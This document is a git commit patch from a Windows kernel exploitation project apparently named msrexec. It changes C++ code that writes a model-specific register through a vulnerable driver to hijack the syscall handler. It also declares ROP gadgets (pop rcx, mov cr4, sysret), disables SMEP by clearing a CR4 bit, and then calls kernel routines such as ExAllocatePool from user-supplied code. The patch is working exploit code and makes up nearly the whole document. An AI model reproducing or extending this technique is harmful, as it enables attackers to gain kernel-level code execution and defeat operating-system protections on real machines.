From 88a6dcf42cc81d55f4403b2dc652c72ea59f7c82 Mon Sep 17 00:00:00 2001 From: _xeroxz Date: Sun, 21 Feb 2021 18:10:03 -0800 Subject: [PATCH] working in vm... testing on metal.. --- main.cpp | 36 ++++++++++++++---------------------- msrexec.cpp | 21 ++++----------------- msrexec.vcxproj.filters | 6 +++--- syscall_handler.h | 14 ++++++++++++++ 4 files changed, 35 insertions(+), 42 deletions(-) create mode 100644 syscall_handler.h diff --git a/main.cpp b/main.cpp index 862cf54..46d4246 100644 --- a/main.cpp +++ b/main.cpp @@ -19,35 +19,27 @@ int __cdecl main(int argc, char** argv) std::printf("NtShutdownSystem -> 0x%p\n", utils::kmodule::get_export("ntoskrnl.exe", "NtShutdownSystem")); writemsr_t _write_msr = - [&](std::uint32_t reg, std::uintptr_t value) -> void + [&](std::uint32_t reg, std::uintptr_t value) -> bool { // put your code here to write MSR.... // the code is defined in vdm::writemsr for me... - vdm::writemsr(reg, value); + return vdm::writemsr(reg, value); }; - const auto ex_alloc_pool = - reinterpret_cast( - utils::kmodule::get_export( - "ntoskrnl.exe", "ExAllocatePool")); - - const auto dbg_print = - reinterpret_cast( - utils::kmodule::get_export( - "ntoskrnl.exe", "DbgPrint")); - vdm::msrexec_ctx msrexec(_write_msr); - std::printf("press enter to run 100 syscall tests...\n"); - std::getchar(); - - for (auto idx = 0u; idx < 100; ++idx) + msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void { - msrexec.exec([&ex_alloc_pool, &dbg_print]() -> void - { - dbg_print("> allocated pool -> 0x%p\n", - ex_alloc_pool(NULL, 0x1000)); - }); - } + const auto dbg_print = + reinterpret_cast( + get_kroutine(krnl_base, "DbgPrint")); + + const auto ex_alloc_pool = + reinterpret_cast( + get_kroutine(krnl_base, "ExAllocatePool")); + + dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000)); + dbg_print("> cr4 -> 0x%p\n", __readcr4()); + }); const auto unload_result = vdm::unload_drv(drv_handle, drv_key); diff --git a/msrexec.cpp b/msrexec.cpp index 9d0e407..4c58ec5 100644 --- a/msrexec.cpp +++ b/msrexec.cpp @@ -29,34 +29,17 @@ namespace vdm cpuid_eax_07 cpuid_features; __cpuid((int*)&cpuid_features, 7); - // if i dont set a bit, it means its 0... cr4 cr4_value{}; - cr4_value.debugging_extensions = true; cr4_value.page_size_extensions = true; cr4_value.machine_check_enable = true; - // however the system can still *not* have PAE enabled - // but i assume if its supported, windows will use it... - // if you find out otherwise please email: _xeroxz@back.engineer... cr4_value.physical_address_extension = cpuid_info.cpuid_feature_information_edx.physical_address_extension; - // again the system can still *not* have PGE enabled - // but i assume if its supported, windows will use it... - // if you find out otherwise please email: _xeroxz@back.engineer... - cr4_value.page_global_enable = - cpuid_info.cpuid_feature_information_edx.page_global_bit; - - // again the system can still *not* have FXSAVE/FXRSTOR enabled - // but i assume if its supported, windows will use it... - // if you find out otherwise please email: _xeroxz@back.engineer... cr4_value.os_fxsave_fxrstor_support = cpuid_info.cpuid_feature_information_edx.fxsave_fxrstor_instructions; - // windows has this bit high on my VM so I - // assume windows can handle these exceptions... - // if you find out otherwise please email: _xeroxz@back.engineer... cr4_value.os_xmm_exception_support = true; cr4_value.fsgsbase_enable = @@ -65,6 +48,10 @@ namespace vdm cr4_value.os_xsave = IsProcessorFeaturePresent(PF_XSAVE_ENABLED); + cr4_value.pcid_enable = + cpuid_info.cpuid_feature_information_ecx + .process_context_identifiers; + m_smep_off.flags = cr4_value.flags; m_smep_off.smep_enable = false; diff --git a/msrexec.vcxproj.filters b/msrexec.vcxproj.filters index cadbdfc..01940b5 100644 --- a/msrexec.vcxproj.filters +++ b/msrexec.vcxproj.filters @@ -17,9 +17,6 @@ Header Files - - Header Files - Header Files @@ -32,6 +29,9 @@ Header Files + + Header Files + diff --git a/syscall_handler.h b/syscall_handler.h new file mode 100644 index 0000000..153ae0b --- /dev/null +++ b/syscall_handler.h @@ -0,0 +1,14 @@ +#pragma once +#include "ia32.hpp" + +extern "C" std::uint32_t m_kpcr_rsp_offset; +extern "C" std::uint32_t m_kpcr_krsp_offset; + +extern "C" std::uintptr_t m_pop_rcx_gadget; +extern "C" std::uintptr_t m_mov_cr4_gadget; +extern "C" std::uintptr_t m_sysret_gadget; + +extern "C" cr4 m_smep_on; +extern "C" cr4 m_smep_off; +extern "C" std::uintptr_t m_system_call; +extern "C" void syscall_wrapper(...); \ No newline at end of file